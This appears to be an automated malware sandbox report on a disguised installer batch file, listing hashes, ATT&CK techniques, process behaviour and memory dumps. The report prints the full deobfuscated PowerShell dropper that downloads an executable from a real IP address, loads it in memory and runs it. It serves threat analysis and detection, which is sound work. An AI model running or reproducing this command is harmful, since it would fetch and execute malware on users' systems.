3e6a57b6588c5f28123ac53555fb31aa7cd1952762ce0ec0723265cda6cc7ebd

Analysis

max time kernel
92s
max time network
17s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
22-01-2025 00:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup/Setup-install.bat
Size

10KB
MD5

13a2664aae1f59fe0dc94ff8fb4dfa06
SHA1

a783e4b0513e16b06fa7872e454860642148957e
SHA256

7b9db02ad489193d1b9a5d7d7edc41a69cbc69d5e15d8267c2bf52a25dd434f3
SHA512

082265517a550bb06f513ddc807536de67a0c8e6531897f4b27d2772bdcbd8307541d83e4d44c9c54beb86d326367716df3dffd29d3ba35077d6afc11477ebbc
SSDEEP

48:syolccKcrr30cFmyPYlyhhcKKIcKKWjJcKz3EcKcKcKfJiPhcK6cKEl559HccG5p:oXtCZuMdpf4a

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://147.45.44.131/infopage/rwtvha.exe

exe.dropper

http://147.45.44.131/infopage/rwtvha.exe

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2776	powershell.exe

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2776	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2776	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2776	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2228 wrote to memory of 2776	2228	cmd.exe	31
PID 2228 wrote to memory of 2776	2228	cmd.exe	31
PID 2228 wrote to memory of 2776	2228	cmd.exe	31

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Setup\Setup-install.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'http://147.45.44.131/infopage/rwtvha.exe'; $webClient = New-Object System.Net.WebClient; $headerName = 'X-Special-Header'; $headerValue = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'; $webClient.Headers.Add($headerName, $headerValue); $fileBytes = $webClient.DownloadData($url); $assembly = [System.Reflection.Assembly]::Load($fileBytes); $entryPoint = $assembly.EntryPoint; if ($entryPoint -ne $null) { $entryPoint.Invoke($null, @()); }"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2776-4-0x000007FEF5F5E000-0x000007FEF5F5F000-memory.dmp

Filesize
4KB

Download
memory/2776-5-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/2776-6-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/2776-7-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2776-8-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2776-9-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2776-10-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2776-11-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2776-12-0x0000000002A70000-0x0000000002A7E000-memory.dmp

Filesize
56KB

Download
memory/2776-13-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download